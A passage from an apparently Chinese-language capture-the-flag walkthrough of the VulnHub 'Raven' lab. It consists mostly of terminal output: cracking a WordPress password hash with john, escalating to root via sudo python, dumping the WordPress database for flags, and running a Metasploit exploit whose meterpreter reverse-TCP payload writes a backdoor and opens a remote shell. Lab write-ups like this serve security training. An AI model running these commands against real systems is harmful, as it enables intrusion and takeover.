Started: Fri Feb 14 19:47:10 2020 Stopped: Fri Feb 14 19:47:19 2020
得到密码为pink84
当然也可以用john来破解,更加的方便,但是所需时间更长
1 2 3 4 5 6 7 8 9 10 11 12 13 14
root@kali:~/vulnhub/raven1# john hash Using default input encoding: UTF-8 Loaded 1 password hash (phpass [phpass ($P$ or $H$) 256/256 AVX2 8x3]) Cost 1 (iteration count) is 8192 for all loaded hashes Will run 4 OpenMP threads Proceeding with single, rules:Single Press 'q' or Ctrl-C to abort, almost any other key for status Almost done: Processing the remaining buffered candidate passwords, if any. Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist Proceeding with incremental:ASCII pink84 (?) 1g 0:00:01:17 DONE 3/3 (2020-02-14 06:52) 0.01287g/s 47616p/s 47616c/s 47616C/s poslus..pingar Use the "--show --format=phpass" options to display all of the cracked passwords reliably Session completed
michael@Raven:/tmp$ su steven Password: $ sudo -l Matching Defaults entries for steven on raven: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User steven may run the following commands on raven: (ALL) NOPASSWD: /usr/bin/python $ sudo python -c 'import pty;pty.spawn("/bin/bash")' root@Raven:/tmp# id uid=0(root) gid=0(root) groups=0(root) root@Raven:/tmp# whoami root root@Raven:/tmp#
root@Raven:~# mysql -uroot -pR@v3nSecurity Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 74 Server version: 5.5.60-0+deb8u1 (Debian)
Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.
Oracle is a registered trademark of Oracle Corporation and/or its affiliates. Other names may be trademarks of their respective owners.
Type 'help;' or '\h'forhelp. Type '\c' to clear the current input statement.
mysql> use wordpress; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A
mysql> select * from wp_posts; +----+-------------+---------------------+---------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+--------------+-------------+----------------+-------------+---------------+---------------+---------+--------+---------------------+---------------------+-----------------------+-------------+------------------------------------------------------------------+------------+-----------+----------------+---------------+ | ID | post_author | post_date | post_date_gmt | post_content | post_title | post_excerpt | post_status | comment_status | ping_status | post_password | post_name | to_ping | pinged | post_modified | post_modified_gmt | post_content_filtered | post_parent | guid | menu_order | post_type | post_mime_type | comment_count | +----+-------------+---------------------+---------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+--------------+-------------+----------------+-------------+---------------+---------------+---------+--------+---------------------+---------------------+-----------------------+-------------+------------------------------------------------------------------+------------+-----------+----------------+---------------+ | 1 | 1 | 2018-08-12 22:49:12 | 2018-08-12 22:49:12 | Welcome to WordPress. This is your first post. Edit or delete it, then start writing! | Hello world! | | publish | open | open | | hello-world | | | 2018-08-12 22:49:12 | 2018-08-12 22:49:12 | | 0 | http://192.168.206.131/wordpress/?p=1 | 0 | post | | 1 | | 2 | 1 | 2018-08-12 22:49:12 | 2018-08-12 22:49:12 | This is an example page. It's different from a blog post because it will stay in one place and will show up in your site navigation (in most themes). Most people start with an About page that introduces them to potential site visitors. It might say something like this: <blockquote>Hi there! I'm a miner by day, aspiring actor by night, and this is my website. I live in Kalgoorlie, have a great dog named Red, and I like yabbies. (And gettin' a tan.)</blockquote> ...or something like this: <blockquote>The XYZ Doohickey Company was founded in 1971, and has been providing quality doohickeys to the public ever since. Located in Gotham City, XYZ employs over 2,000 people and does all kinds of awesome things for the Gotham community.</blockquote> As a new WordPress user, you should go to <a href="http://192.168.206.131/wordpress/wp-admin/">your dashboard</a> to delete this page and create new pages for your content. Have fun! | Sample Page | | publish | closed | open | | sample-page | | | 2018-08-12 22:49:12 | 2018-08-12 22:49:12 | | 0 | http://192.168.206.131/wordpress/?page_id=2 | 0 | page | | 0 | | 4 | 1 | 2018-08-13 01:48:31 | 0000-00-00 00:00:00 | flag3{afc01ab56b50591e7dccf93122770cd2} | flag3 | | draft | open | open | | | | | 2018-08-13 01:48:31 | 2018-08-13 01:48:31 | | 0 | http://raven.local/wordpress/?p=4 | 0 | post | | 0 | | 5 | 1 | 2018-08-12 23:31:59 | 2018-08-12 23:31:59 | flag4{715dea6c055b9fe3337544932f2941ce} | flag4 | | inherit | closed | closed | | 4-revision-v1 | | | 2018-08-12 23:31:59 | 2018-08-12 23:31:59 | | 4 | http://raven.local/wordpress/index.php/2018/08/12/4-revision-v1/ | 0 | revision | | 0 | | 7 | 2 | 2018-08-13 01:48:31 | 2018-08-13 01:48:31 | flag3{afc01ab56b50591e7dccf93122770cd2} | flag3 | | inherit | closed | closed | | 4-revision-v1 | | | 2018-08-13 01:48:31 | 2018-08-13 01:48:31 | | 4 | http://raven.local/wordpress/index.php/2018/08/13/4-revision-v1/ | 0 | revision | | 0 | +----+-------------+---------------------+---------------------+-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+--------------+--------------+-------------+----------------+-------------+---------------+---------------+---------+--------+---------------------+---------------------+-----------------------+-------------+------------------------------------------------------------------+------------+-----------+----------------+---------------+ 5 rows in set (0.00 sec)
Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 192.168.56.118 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>' RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections TARGETURI /contact.php yes Path to the application root TRIGGERURI / no Path to the uploaded payload VHOST no HTTP server virtual host WEB_ROOT /var/www/html yes Path to the web root
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.56.102 yes The listen address (an interface may be specified) LPORT 4444 yes The listen port
[*] Started reverse TCP handler on 192.168.56.102:4444 [*] Writing the backdoor to /var/www/html/XTXxkX1w.php [*] Sleeping before requesting the payload from: /XTXxkX1w.php [*] Waiting for up to 300 seconds to trigger the payload [*] Sending stage (38288 bytes) to 192.168.56.118 [*] Meterpreter session 2 opened (192.168.56.102:4444 -> 192.168.56.118:34607) at 2020-02-14 08:02:30 -0500 [+] Deleted /var/www/html/XTXxkX1w.php [+] Successfully triggered the payload